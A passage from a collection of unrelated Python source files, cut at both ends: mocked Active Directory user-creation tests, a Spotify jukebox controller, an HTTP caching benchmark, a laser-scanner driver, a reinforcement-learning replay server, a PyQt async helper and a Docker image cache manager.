When:
Running the `create_user_iam` command
Then:
The user was created successfully in AD.
"""
import Active_Directory_Query
add_args, add_kwargs = [], {}
class ConnectionMocker:
entries = []
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
def search(self, *args, **kwargs):
return
def add(self, *args, **kwargs):
nonlocal add_args, add_kwargs
add_args, add_kwargs = args, kwargs
return True
Active_Directory_Query.conn = ConnectionMocker()
args = {"user-profile": json.dumps({"email": "test@paloaltonetworks.com", "username": "test",
"locationregion": "Americas"})}
mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False)
mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': 'test@paloaltonetworks.com',
'sAMAccountName': 'test',
'userPrincipalName': 'test',
"ou": "OU=Americas,OU=Demisto"})
user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '')
outputs = get_outputs_from_user_profile(user_profile)
assert outputs.get('action') == IAMActions.CREATE_USER
assert outputs.get('success') is True
assert outputs.get('active') is False
assert outputs.get('email') == 'test@paloaltonetworks.com'
def test_unseccsseful_create_user_iam_missing_ou(mocker):
"""
Given:
A valid user profile with missing ou in the mapping
When:
Running the `create_user_iam` command
Then:
- The user was not created in AD.
- An error message was returned.
"""
import Active_Directory_Query
add_args, add_kwargs = [], {}
class ConnectionMocker:
entries = []
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
def search(self, *args, **kwargs):
return
def add(self, *args, **kwargs):
nonlocal add_args, add_kwargs
add_args, add_kwargs = args, kwargs
return True
Active_Directory_Query.conn = ConnectionMocker()
args = {"user-profile": json.dumps({"email": "test@paloaltonetworks.com", "username": "test",
"locationregion": "Americas"})}
mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False)
mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': 'test@paloaltonetworks.com',
'sAMAccountName': 'test',
'userPrincipalName': 'test'})
user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '')
outputs = get_outputs_from_user_profile(user_profile)
assert outputs.get('action') == IAMActions.CREATE_USER
assert outputs.get('success') is False
assert outputs.get('email') == 'test@paloaltonetworks.com'
assert 'User must have an Organizational Unit (OU)' in outputs.get('errorMessage')
def test_unseccsseful_create_user_iam_missing_samaccountname(mocker):
"""
Given:
A valid user profile with missing samaccountname in the mapping
When:
Running the `create_user_iam` command
Then:
- The user was not created in AD.
- An error message was returned.
"""
import Active_Directory_Query
add_args, add_kwargs = [], {}
class ConnectionMocker:
entries = []
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
def search(self, *args, **kwargs):
return
def add(self, *args, **kwargs):
nonlocal add_args, add_kwargs
add_args, add_kwargs = args, kwargs
return True
Active_Directory_Query.conn = ConnectionMocker()
args = {"user-profile": json.dumps({"email": "test@paloaltonetworks.com", "username": "test",
"locationregion": "Americas"})}
mocker.patch('Active_Directory_Query.check_if_user_exists_by_attribute', return_value=False)
mocker.patch.object(IAMUserProfile, 'map_object', return_value={'cn': 'test', 'mail': 'test@paloaltonetworks.com',
"ou": "OU=Americas,OU=Demisto",
'userPrincipalName': 'test'})
user_profile = Active_Directory_Query.create_user_iam('', args, 'mapper_out', '')
outputs = get_outputs_from_user_profile(user_profile)
assert outputs.get('action') == IAMActions.CREATE_USER
assert outputs.get('success') is False
assert outputs.get('email') == 'test@paloaltonetworks.com'
assert 'User must have a sAMAccountName' in outputs.get('errorMessage')
def test_group_entry_no_custom_attributes():
"""
Given:
Custom attributes to filter the group object entry.
When:
The function filters the group object according to the custom attributes.
Then:
The function will return all the group object entry because custom attributes contain '*'.
"""
from Active_Directory_Query import group_entry
custom_attributes_with_asterisk = group_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf'}, ['*'])
assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD'}
def test_group_entry():
"""
Given:
Custom attributes to filter the group object entry.
When:
The function filters the group object according to the custom attributes.
Then:
The function will return all the group object entry because custom attributes contain '*'.
"""
from Active_Directory_Query import group_entry
custom_attributes_with_asterisk = group_entry({'dn': 'dn', 'name': 'name', 'memberOf': 'memberOf',
'displayName': 'display name'}, ['displayName'])
assert custom_attributes_with_asterisk == {'Groups': 'memberOf', 'ID': 'dn', 'Name': 'name', 'Type': 'AD',
'displayName': 'display name'}
def test_search_group_members(mocker):
"""
sanity test for search_group_members method
"""
import Active_Directory_Query
class EntryMocker:
def entry_to_json(self):
return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}'
class ConnectionMocker:
entries = [EntryMocker()]
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
def search(self, *args, **kwargs):
time.sleep(1)
return
expected_results = {'ContentsFormat': 'json', 'Type': 1,
'Contents': [{'dn': 'dn', 'attributes': {'memberOf': ['memberOf'], 'name': ['name']}}],
'ReadableContentsFormat': 'markdown',
'HumanReadable': '### Active Directory - Get Group Members\n|'
'dn|memberOf|name|\n|---|---|---|\n| dn | memberOf | name |\n',
'EntryContext': {'ActiveDirectory.Groups(obj.dn ==dn)': {'dn': 'dn', 'members': [
{'dn': 'dn', 'category': 'group'}]}, 'ActiveDirectory.Groups(obj.dn == val.dn)':
[{'dn': 'dn', 'memberOf': ['memberOf'], 'name': ['name']}], 'Group':
[{'Type': 'AD', 'ID': 'dn', 'Name': ['name'], 'Groups': ['memberOf']}]}}
expected_results = f'demisto results: {json.dumps(expected_results, indent=4, sort_keys=True)}'
mocker.patch.object(demisto, 'args',
return_value={'member-type': 'group', 'group-dn': 'dn', 'time_limit': '1'})
Active_Directory_Query.conn = ConnectionMocker()
with patch('logging.Logger.info') as mock:
Active_Directory_Query.search_group_members('dc', 1)
mock.assert_called_with(expected_results)
def test_group_dn_escape_characters():
"""
Given:
Group name with parentheses
When:
Running the function group_dn
Then:
The function search gets the group name after escape special characters.
"""
import Active_Directory_Query
class EntryMocker:
def entry_to_json(self):
return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}'
class ConnectionMocker:
entries = [EntryMocker()]
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
Active_Directory_Query.conn = ConnectionMocker()
with patch('Active_Directory_Query.search', return_value=[EntryMocker()]) as mock:
group_dn('group(group)', '')
mock.assert_called_with('(&(objectClass=group)(cn=group\\28group\\29))', '')
def test_search__no_control_exist(mocker):
"""
Given:
No control key in the result
When:
Run any search query
Then:
The result return 'no entries' instead of throw exception
"""
import Active_Directory_Query
class ConnectionMocker:
entries = []
result = {}
def search(self, *args, **kwargs):
return
mocker.patch.object(demisto, 'results')
Active_Directory_Query.conn = ConnectionMocker()
Active_Directory_Query.search_users('dc=test,dc=test_1', page_size=20)
assert '**No entries.**' in demisto.results.call_args[0][0]['HumanReadable']
def test_user_account_to_boolean_fields():
"""
Given:
a userAccountControl value
When:
parsing the userAccountControl fields
Then:
Only the relevant fields will be marked as true
"""
import Active_Directory_Query
fields = Active_Directory_Query.user_account_to_boolean_fields(0x50)
assert {k for k, v in fields.items() if v} == {'LOCKOUT', 'PASSWD_CANT_CHANGE'}
@pytest.mark.parametrize('flags', [512, 0, 544])
def test_restore_user(mocker, flags):
"""
Given:
A disabled user.
When:
Calling restore_user method.
Then:
Verify the existing flag is returned.
"""
from Active_Directory_Query import restore_user
re_val = {'flat': [{'userAccountControl': [flags]}]}
mocker.patch('Active_Directory_Query.search_with_paging', return_value=re_val)
mocker.patch.object(demisto, 'args')
assert restore_user('test_user', 0) == flags
def test_enable_user_with_restore_user_option(mocker):
"""
Given:
A disabled user.
When:
Calling enable_user method.
Then:
Verify the existing flag is returned with the disable bit off.
"""
from Active_Directory_Query import enable_user
disabled_account_with_properties = 546
enabled_account_with_properties = 544
mocker.patch('Active_Directory_Query.restore_user', return_value=disabled_account_with_properties)
mocker.patch('Active_Directory_Query.user_dn', return_value='test_dn')
modify_data = mocker.patch('Active_Directory_Query.modify_object')
mocker.patch.object(demisto, 'args')
enable_user('test_user', 0)
assert modify_data.call_args.args[1].get('userAccountControl')[0][1] == enabled_account_with_properties
def test_search_with_paging_bug(mocker):
"""
Given:
page size larger than 1.
When:
running get-group-members command.
Then:
time_limit results returned.
"""
import Active_Directory_Query
class EntryMocker:
def entry_to_json(self):
return '{"dn": "dn","attributes": {"memberOf": ["memberOf"], "name": ["name"]}}'
class ConnectionMocker:
entries = []
result = {'controls': {'1.2.840.113556.1.4.319': {'value': {'cookie': '<cookie>'}}}}
def search(self, *args, **kwargs):
page_size = kwargs.get('paged_size')
if page_size:
self.entries = [EntryMocker() for i in range(page_size)]
time.sleep(1)
return
mocker.patch.object(demisto, 'results')
mocker.patch.object(demisto, 'args',
return_value={'member-type': 'group', 'group-dn': 'dn', 'time_limit': '3'})
Active_Directory_Query.conn = ConnectionMocker()
with patch('logging.Logger.info'):
Active_Directory_Query.search_group_members('dc', 1)
assert len(demisto.results.call_args[0][0]['Contents']) == 3
|
jukeboxController.py | __author__ = 'matt'
import threading
import spotify_wrapper
from redisBroker import RedisBroker
from time import sleep
from collections import deque
import requests
from sys import stdin
SERVER = 'pyply.j.layershift.co.uk'
SKIP_THRESHOLD = 3
class JukeboxController:
def __init__(self):
self.playlist = None
self.currentSkipCount = 0
def addSkipVote(self):
self.currentSkipCount += 1
if self.currentSkipCount >= SKIP_THRESHOLD:
self.goNextTrack()
def togglePausePlayer(self):
spotify_wrapper.play_pause()
def pausePlayer(self):
if spotify_wrapper.player_state() == 'playing':
spotify_wrapper.play_pause()
def goNextTrack(self):
if self.playlist:
self.currentSkipCount = 0
nextTrack = self.playlist.popleft()
self.playlist.append(nextTrack)
spotify_wrapper.play_track(nextTrack)
print('Now playing ' + nextTrack)
def setPlaylist(self, pl):
self.playlist = deque(pl)
def spotifyController(self):
while True:
if self.playlist:
status = spotify_wrapper.player_state()
if status == 'stopped':
self.goNextTrack()
sleep(1)
if __name__ == "__main__":
#print('Enter Party ID:')
#partyId = stdin.readline()[:-1]
print "Using Party ID party"
partyId = "party"
jukebox = JukeboxController()
jukeThread = threading.Thread(name='SpotifyController', target=jukebox.spotifyController)
redisBroker = RedisBroker(jukebox)
brokerThread = threading.Thread(name='MessageListener', target=redisBroker.messageListener, args=(partyId,))
#r = requests.get('http://{}/party/{}'.format(SERVER, partyId))
#if r.status_code == 200 and r.json()['success'] and r.json()['playlist_prompt']:
#print('Enter Spotify playlist URI:')
#plist = stdin.readline()[:-1]
#r = requests.get('http://{}/playlist/{}/{}'.format(SERVER, partyId, plist))
jukeThread.start()
brokerThread.start()
jukeThread.join()
|
benchmark.py | import sys
import requests
import argparse
from multiprocessing import Process
from datetime import datetime
from wsgiref.simple_server import make_server
from cachecontrol import CacheControl
HOST = 'localhost'
PORT = 8050
URL = 'http://{0}:{1}/'.format(HOST, PORT)
class Server(object):
def __call__(self, env, sr):
body = 'Hello World!'
status = '200 OK'
headers = [
('Cache-Control', 'max-age=%i' % (60 * 10)),
('Content-Type', 'text/plain'),
]
sr(status, headers)
return body
def start_server():
httpd = make_server(HOST, PORT, Server())
httpd.serve_forever()
def run_benchmark(sess):
proc = Process(target=start_server)
proc.start()
start = datetime.now()
for i in xrange(0, 1000):
sess.get(URL)
sys.stdout.write('.')
end = datetime.now()
print()
total = end - start
print('Total time for 1000 requests: %s' % total)
proc.terminate()
def run():
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--no-cache',
default=False,
action='store_true',
help='Do not use cachecontrol')
args = parser.parse_args()
sess = requests.Session()
if not args.no_cache:
sess = CacheControl(sess)
run_benchmark(sess)
if __name__ == '__main__':
run()
|
hokuyo_controller.py | import logging
import logging.config
import sys
import threading
import traceback
import os
import serial
from amberdriver.common.message_handler import MessageHandler
from amberdriver.hokuyo import hokuyo_pb2
from amberdriver.hokuyo.hokuyo import Hokuyo
from amberdriver.null.null import NullController
from amberdriver.tools import serial_port, config
__author__ = 'paoolo'
pwd = os.path.dirname(os.path.abspath(__file__))
logging.config.fileConfig('%s/hokuyo.ini' % pwd)
config.add_config_ini('%s/hokuyo.ini' % pwd)
LOGGER_NAME = 'HokuyoController'
HIGH_SENSITIVE = config.HOKUYO_HIGH_SENSITIVE_ENABLE == 'True'
SPEED_MOTOR = int(config.HOKUYO_SPEED_MOTOR)
SERIAL_PORT = config.HOKUYO_SERIAL_PORT
BAUD_RATE = config.HOKUYO_BAUD_RATE
TIMEOUT = 0.3
class HokuyoController(MessageHandler):
def __init__(self, pipe_in, pipe_out, driver):
super(HokuyoController, self).__init__(pipe_in, pipe_out)
self.__hokuyo = driver
self.__logger = logging.getLogger(LOGGER_NAME)
def handle_data_message(self, header, message):
if message.HasExtension(hokuyo_pb2.get_single_scan):
self.__handle_get_single_scan(header, message)
else:
self.__logger.warning('No recognizable request in message')
@MessageHandler.handle_and_response
def __handle_get_single_scan(self, _received_header, _received_message, response_header, response_message):
self.__logger.debug('Get single scan')
angles, distances, timestamp = self.__hokuyo.get_single_scan()
response_message = HokuyoController.__fill_scan(response_message, angles, distances, timestamp)
return response_header, response_message
def handle_subscribe_message(self, header, message):
self.__logger.debug('Subscribe action')
self.add_subscribers(header.clientIDs)
self.__hokuyo.enable_scanning(True)
def handle_unsubscribe_message(self, header, message):
self.__logger.debug('Unsubscribe action for clients %s', str(header.clientIDs))
map(self.remove_subscriber, header.clientIDs)
if not self.is_any_subscriber():
self.__hokuyo.enable_scanning(False)
def handle_client_died_message(self, client_id):
self.__logger.info('Client %d died', client_id)
self.remove_subscriber(client_id)
if not self.is_any_subscriber():
self.__hokuyo.enable_scanning(False)
def fill_subscription_response(self, response_message):
angles, distances, timestamp = self.__hokuyo.get_scan()
return HokuyoController.__fill_scan(response_message, angles, distances, timestamp)
@staticmethod
def __fill_scan(response_message, angles, distances, timestamp):
response_message.Extensions[hokuyo_pb2.scan].angles.extend(angles)
response_message.Extensions[hokuyo_pb2.scan].distances.extend(distances)
response_message.Extensions[hokuyo_pb2.timestamp] = timestamp
return response_message
if __name__ == '__main__':
try:
_serial = serial.Serial(port=SERIAL_PORT, baudrate=BAUD_RATE, timeout=TIMEOUT)
_serial_port = serial_port.SerialPort(_serial)
_serial.write('QT\nRS\nQT\n')
result = ''
flushing = True
while flushing:
char = _serial.read()
flushing = (char != '')
result += char
sys.stderr.write('\n===============\nFLUSH SERIAL PORT\n"%s"\n===============\n' % result)
hokuyo = Hokuyo(_serial_port)
sys.stderr.write('RESET:\n%s\n' % hokuyo.reset())
sys.stderr.write('LASER_ON:\n%s\n' % hokuyo.laser_on())
sys.stderr.write('HIGH_SENSITIVE:\n%s\n' % hokuyo.set_high_sensitive(HIGH_SENSITIVE))
sys.stderr.write('SPEED_MOTOR:\n%s\n' % hokuyo.set_motor_speed(SPEED_MOTOR))
sys.stderr.write('SENSOR_SPECS:\n%s\n' % hokuyo.get_sensor_specs())
sys.stderr.write('SENSOR_STATE:\n%s\n' % hokuyo.get_sensor_state())
sys.stderr.write('VERSION_INFO:\n%s\n' % hokuyo.get_version_info())
scanning_thread = threading.Thread(target=hokuyo.scanning_loop, name="scanning-thread")
scanning_thread.start()
controller = HokuyoController(sys.stdin, sys.stdout, hokuyo)
controller()
except BaseException as e:
sys.stderr.write('Run without Hokuyo.\n')
traceback.print_exc()
controller = NullController(sys.stdin, sys.stdout)
controller() |
replay_server.py | import math
import socket
import time
from multiprocessing import Process, shared_memory, Value, Lock, Queue
import database
import numpy as np
import traceback
import datetime
def request_episode_id(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue, args):
try:
from bandit import bandit_client
j = bandit_client.BanditClient(params).get_j()
in_db = False
with next_episode_id.get_lock():
episode_id = next_episode_id.value
in_db = cm.init_episode(episode_id, j)
if in_db:
next_episode_id.value += 1
if in_db:
with progress_lock:
check = np.sum(np.where(in_progress == -1, np.ones_like(in_progress), np.zeros_like(in_progress)))
print(f"\n{check} spaces open for episodes.\n {datetime.datetime.now()}")
if check > 0:
for i in range(len(in_progress)):
if in_progress[i] < 0:
in_progress[i] = episode_id
return f"{episode_id}_{j}"
except Exception as e:
print(e)
print(traceback.print_exc())
return "-1_-1"
def request_trace_batch(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue, args):
batch_index = int(args[0])
with progress_lock:
check = np.sum(np.where(in_progress == -1, np.ones_like(in_progress), np.zeros_like(in_progress)))
if check == 0:
return "-1"
has_batch = cm.get_trace_batch_ids(params['Misc']['min_required_sequences'], batches, batch_lock, batch_index)
if not has_batch:
return "-1"
else:
return "_".join(str(v) for v in batches[batch_index])
def request_trace_update(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue, args):
batch_index = int(args[0])
return "_".join(str(v) for v in batches[batch_index]), True
def request_transition_upload(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue, args):
with space_lock:
can_upload = min(transition_space_available[0], int(args[0]))
transition_space_available[0] -= can_upload
return str(can_upload)
def priority_calculator(params, config, episode_queue):
trace_length = params['Misc']['trace_length']
replay_period = params['Misc']['replay_period']
N = params['Misc']['N']
training_splits = params['Misc']['training_splits'] if params['Misc']['break_training_loop_early'] else 1
cm = database.ConnectionManager(config)
while True:
episode_id = episode_queue.get()
cm.calculate_priorities(trace_length, replay_period, N, episode_id, training_splits)
def signal_episode_end(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue, args):
episode_id = int(args[0])
print(f"\nEnd of episode {episode_id}\n {datetime.datetime.now()}")
with progress_lock:
in_progress[:] = np.where(in_progress == episode_id, np.full(in_progress.shape, fill_value=-1, dtype='i'),
in_progress)
episode_queue.put(episode_id)
return "1"
def signal_trace_update(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue, args):
batch_index = int(args[0])
with batch_lock:
batches[batch_index, :] = -1
return "1"
def worker(socket, params, config, shared_mem, space_lock, progress_lock, batch_lock, next_episode_id, episode_queue):
shared_mem = shared_memory.SharedMemory(name=shared_mem)
L = params['Misc']['L'] * params['Misc']['consecutive_batches'] * 2
b = params['Misc']['training_batch_size']
c = params['Misc']['consecutive_training_batches']
in_progress = np.ndarray(L + (b * c), dtype='i', buffer=shared_mem.buf[:-8])
in_progress, batches = np.split(in_progress, [L])
batches = batches.reshape((c, b))
transition_space_available = np.ndarray(1, dtype=np.int64, buffer=shared_mem.buf[-8:])
lookup = {
"request": {
"episode": {
"id": (0, request_episode_id)
},
"trace": {
"batch": (1, request_trace_batch),
"update": (1, request_trace_update)
},
"transition": {
"upload": (1, request_transition_upload)
}
},
"signal": {
"episode": {
"end": (1, signal_episode_end)
},
"trace": {
"update": (1, signal_trace_update)
}
}
}
cm = database.ConnectionManager(config)
while True:
try:
client, address = socket.accept()
data = client.recv(1024)
data = iter(data.decode('utf-8').split("_"))
additional_arg_count, function = lookup[next(data)][next(data)][next(data)]
message = function(params, cm, transition_space_available, space_lock, in_progress, progress_lock, batches,
batch_lock, next_episode_id, episode_queue,
[next(data) for i in range(additional_arg_count)])
client.send(bytes(message, 'utf-8'))
client.close()
except Exception as e:
print(e)
print(traceback.print_exc())
print(datetime.datetime.now())
def space_allocator(params, config, shared_mem, space_lock, progress_lock, batch_lock):
shared_mem = shared_memory.SharedMemory(name=shared_mem)
L = params['Misc']['L'] * params['Misc']['consecutive_batches'] * 2
b = params['Misc']['training_batch_size']
c = params['Misc']['consecutive_training_batches']
in_progress = np.ndarray(L + (b * c), dtype='i', buffer=shared_mem.buf[:-8])
in_progress, batches = np.split(in_progress, [L])
batches = batches.reshape((c, b))
transition_space_available = np.ndarray(1, dtype=np.int64, buffer=shared_mem.buf[-8:])
cm = database.ConnectionManager(config)
target_free_space = params['Misc']['target_free_space'] * (1024 ** 3)
byte_limit = params['Misc']['database_size_limit'] * (1024 ** 3)
bytes_per_transition = 41840
num_episodes_allowed = len(in_progress)
while True:
db_size = cm.get_database_size()
if db_size > byte_limit - target_free_space and cm.get_episode_count() > num_episodes_allowed:
print("\nALLOCATING SPACE")
print(datetime.datetime.now())
cm.remove_all_but(num_episodes_allowed, in_progress, progress_lock, batches, batch_lock)
db_size = cm.get_database_size()
free_space = byte_limit - db_size
with space_lock:
transition_space_available[0] = free_space // bytes_per_transition
time.sleep(10)
def server(params, config):
import mariadb
from replay_server import database
sockets = []
ip = params['Misc']['replay_ip']
port_range = params['Misc']['replay_port_range']
for port in range(min(port_range), max(port_range) + 1):
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind((ip, port))
serversocket.listen(5)
sockets.append(serversocket)
L = params['Misc']['L'] * params['Misc']['consecutive_batches'] * 2
b = params['Misc']['training_batch_size']
c = params['Misc']['consecutive_training_batches']
shared_mem = shared_memory.SharedMemory(create=True, size=(L + (b * c)) * 4 + 8)
init_array = np.ndarray((L + (b * c)), dtype='i', buffer=shared_mem.buf[:-8])
transition_space_available = np.ndarray(1, dtype=np.int64, buffer=shared_mem.buf[-8:])
init_array[:] = -1
progress_lock = Lock()
batch_lock = Lock()
space_lock = Lock()
next_episode_id = Value('i', 0)
cm = database.ConnectionManager(config)
cm.cur.execute("SELECT episode_id FROM episode ORDER BY episode_id DESC")
for r in cm.cur:
with next_episode_id.get_lock():
next_episode_id.value = r[0] + 1
break
del cm
episode_queue = Queue()
Process(target=space_allocator,
args=(params, config, shared_mem.name, space_lock, progress_lock, batch_lock)).start()
Process(target=priority_calculator, args=(params, config, episode_queue)).start()
workers = [Process(target=worker, args=(
serversocket, params, config, shared_mem.name, space_lock, progress_lock, batch_lock, next_episode_id,
episode_queue)) for i in range(params['Misc']['replay_workers']) for serversocket in sockets]
for p in workers:
p.daemon = True
p.start()
while True:
pass
if __name__ == "__main__":
import yaml
with open('../params.yml', 'r') as file:
params = yaml.full_load(file)
server(params, database.DEFAULT_CONFIG)
|
asynchronous.py | import traceback
from enum import Enum
from multiprocessing import Process, Queue, Value
from PyQt5.QtCore import pyqtSignal, QThread
class SignalType(Enum):
PROGRESS = 2,
COMPLETED = 3,
CANCELLED = 4,
ERRORED = 5,
class ProcessSignals:
"""
An object that the child process uses to send information to the PyQT thread
"""
def __init__(self):
self.queue = Queue()
self._halt = Value('i', 0)
def progress(self, *args):
self.queue.put((SignalType.PROGRESS, *args))
def completed(self, *args):
self.queue.put((SignalType.COMPLETED, *args))
def cancelled(self, *args):
self.queue.put((SignalType.CANCELLED, *args))
def errored(self, *args):
self.queue.put((SignalType.ERRORED, *args))
def halt(self):
return self._halt.value == 1
def setHalt(self):
self._halt.value = 1
# Can't be part of AsyncTask as this function must be picklable under windows:
# (see https://docs.python.org/2/library/multiprocessing.html#windows)
def wrappedJobFn(jobFn, processSignals, *args):
try:
jobFn(processSignals, *args)
except Exception as e:
traceback.print_exc()
processSignals.errored(e)
class AsyncTask(QThread):
"""
Runs a job in a separate process and forwards messages from the job to the
main thread through a pyqtSignal.
"""
msg_from_job = pyqtSignal(object)
running = True
def __init__(self, pyqtSignals, jobFn, *args):
super().__init__()
self.jobFn = jobFn
self.args = args
self.pyqtSignals = pyqtSignals
self.processSignals = ProcessSignals()
def run(self):
self.running = True
p = Process(target=wrappedJobFn, args=(self.jobFn, self.processSignals, *self.args))
p.start()
while self.running:
self._processOutput(self.processSignals.queue.get())
def _processOutput(self, output):
if output[0] is SignalType.PROGRESS:
self.pyqtSignals.processing_progress.emit(output[1:])
return
if output[0] is SignalType.COMPLETED:
self.pyqtSignals.processing_completed.emit()
self.running = False
return
if output[0] is SignalType.CANCELLED:
self.pyqtSignals.processing_cancelled.emit()
self.running = False
return
if output[0] is SignalType.ERRORED:
self.pyqtSignals.processing_errored.emit(output[1:])
self.running = False
return
def halt(self):
self.processSignals.setHalt()
|
docker_image_manager.py | from collections import namedtuple
import threading
import time
import traceback
import logging
import docker
from codalab.worker.fsm import DependencyStage
from codalab.worker.state_committer import JsonStateCommitter
from codalab.worker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
# Stores the download state of a Docker image (also includes the digest being pulled, digest string, DependencyStage and relevant status message from the download)
ImageAvailabilityState = namedtuple('ImageAvailabilityState', ['digest', 'stage', 'message'])
# Stores information relevant about caching about docker images
ImageCacheEntry = namedtuple(
'ImageCacheEntry', ['id', 'digest', 'last_used', 'virtual_size', 'marginal_size']
)
class DockerImageManager:
def __init__(self, commit_file, max_image_cache_size):
"""
Initializes a DockerImageManager
:param commit_file: String path to where the state file should be committed
:param max_image_cache_size: Total size in bytes that the image cache can use
"""
self._state_committer = JsonStateCommitter(commit_file) # type: JsonStateCommitter
self._docker = docker.from_env() # type: DockerClient
self._image_cache = {} # type: Dict[str, ImageCacheEntry]
self._downloading = ThreadDict(
fields={'success': False, 'status': 'Download starting.'}, lock=True
)
self._max_image_cache_size = max_image_cache_size
self._lock = threading.RLock()
self._stop = False
self._sleep_secs = 10
self._cleanup_thread = None
self._load_state()
def _save_state(self):
with self._lock:
self._state_committer.commit(self._image_cache)
def _load_state(self):
with self._lock:
self._image_cache = self._state_committer.load()
def start(self):
logger.info("Starting docker image manager")
if self._max_image_cache_size:
def cleanup_loop(self):
while not self._stop:
try:
self._cleanup()
self._save_state()
except Exception:
traceback.print_exc()
time.sleep(self._sleep_secs)
self._cleanup_thread = threading.Thread(target=cleanup_loop, args=[self])
self._cleanup_thread.start()
def stop(self):
logger.info("Stopping docker image manager")
self._stop = True
logger.debug("Stopping docker image manager: stop the downloads threads")
self._downloading.stop()
if self._cleanup_thread:
logger.debug("Stopping docker image manager: stop the cleanup thread")
self._cleanup_thread.join()
logger.info("Stopped docker image manager")
def _cleanup(self):
"""
Prunes the image cache for runs.
1. Only care about images we (this DockerImageManager) downloaded and know about
2. We use sum of VirtualSize's, which is an upper bound on the disk use of our images:
in case no images share any intermediate layers, this will be the real disk use,
however if images share layers, the virtual size will count that layer's size for each
image that uses it, even though it's stored only once in the disk. The 'Size' field
accounts for the marginal size each image adds on top of the shared layers, but summing
those is not accurate either since the shared base layers need to be counted once to get
the total size. (i.e. summing marginal sizes would give us a lower bound on the total disk
use of images). Calling df gives us an accurate disk use of ALL the images on the machine
but because of (1) we don't want to use that.
"""
while not self._stop:
deletable_entries = set(self._image_cache.values())
disk_use = sum(cache_entry.virtual_size for cache_entry in deletable_entries)
while disk_use > self._max_image_cache_size:
entry_to_remove = min(deletable_entries, key=lambda entry: entry.last_used)
logger.info(
'Disk use (%s) > max cache size (%s), pruning image: %s',
disk_use,
self._max_image_cache_size,
entry_to_remove.digest,
)
try:
image_to_delete = self._docker.images.get(entry_to_remove.id)
tags_to_delete = image_to_delete.tags
for tag in tags_to_delete:
self._docker.images.remove(tag)
# if we successfully removed the image also remove its cache entry
del self._image_cache[entry_to_remove.digest]
except docker.errors.NotFound:
# image doesn't exist anymore for some reason, stop tracking it
del self._image_cache[entry_to_remove.digest]
except docker.errors.APIError as err:
# Maybe we can't delete this image because its container is still running
# (think a run that takes 4 days so this is the oldest image but still in use)
# In that case we just continue with our lives, hoping it will get deleted once
# it's no longer in use and the cache becomes full again
logger.error(
"Cannot remove image %s from cache: %s", entry_to_remove.digest, err
)
deletable_entries.remove(entry_to_remove)
disk_use = sum(entry.virtual_size for entry in deletable_entries)
logger.debug("Stopping docker image manager cleanup")
def get(self, image_spec):
"""
Always request the newest docker image from Dockerhub if it's not in downloading thread and return the current
downloading status(READY, FAILED, or DOWNLOADING).
When the requested image in the following states:
1. If it's not available on the platform, we download the image and return DOWNLOADING status.
2. If another thread is actively downloading it, we return DOWNLOADING status.
3. If another thread was downloading it but not active by the time the request was sent, we return the following status:
* READY if the image was downloaded successfully.
* FAILED if the image wasn't able to be downloaded due to any reason.
:param image_spec: Repo image_spec of docker image being requested
:returns: A DockerAvailabilityState object with the state of the docker image
"""
if ':' not in image_spec:
# Both digests and repo:tag kind of specs include the : character. The only case without it is when
# a repo is specified without a tag (like 'latest')
# When this is the case, different images API methods act differently:
# - pull pulls all tags of the image
# - get tries to get `latest` by default
# That means if someone requests a docker image without a tag, and the image does not have a latest
# tag pushed to Dockerhub, pull will succeed since it will pull all other tags, but later get calls
# will fail since the `latest` tag won't be found on the system.
# We don't want to assume what tag the user wanted so we want the pull step to fail if no tag is specified
# and there's no latest tag on dockerhub.
# Hence, we append the latest tag to the image spec if there's no tag specified otherwise at the very beginning
image_spec += ':latest'
try:
if image_spec in self._downloading:
with self._downloading[image_spec]['lock']:
if self._downloading[image_spec].is_alive():
return ImageAvailabilityState(
digest=None,
stage=DependencyStage.DOWNLOADING,
message=self._downloading[image_spec]['status'],
)
else:
if self._downloading[image_spec]['success']:
image = self._docker.images.get(image_spec)
digest = image.attrs.get('RepoDigests', [image_spec])[0]
with self._lock:
self._image_cache[digest] = ImageCacheEntry(
id=image.id,
digest=digest,
last_used=time.time(),
virtual_size=image.attrs['VirtualSize'],
marginal_size=image.attrs['Size'],
)
status = ImageAvailabilityState(
digest=digest, stage=DependencyStage.READY, message='Image ready'
)
else:
status = ImageAvailabilityState(
digest=None,
stage=DependencyStage.FAILED,
message=self._downloading[image_spec]['message'],
)
self._downloading.remove(image_spec)
return status
else:
def download():
logger.debug('Downloading Docker image %s', image_spec)
try:
self._docker.images.pull(image_spec)
logger.debug('Download for Docker image %s complete', image_spec)
self._downloading[image_spec]['success'] = True
self._downloading[image_spec]['message'] = "Downloading image"
except (docker.errors.APIError, docker.errors.ImageNotFound) as ex:
logger.debug('Download for Docker image %s failed: %s', image_spec, ex)
self._downloading[image_spec]['success'] = False
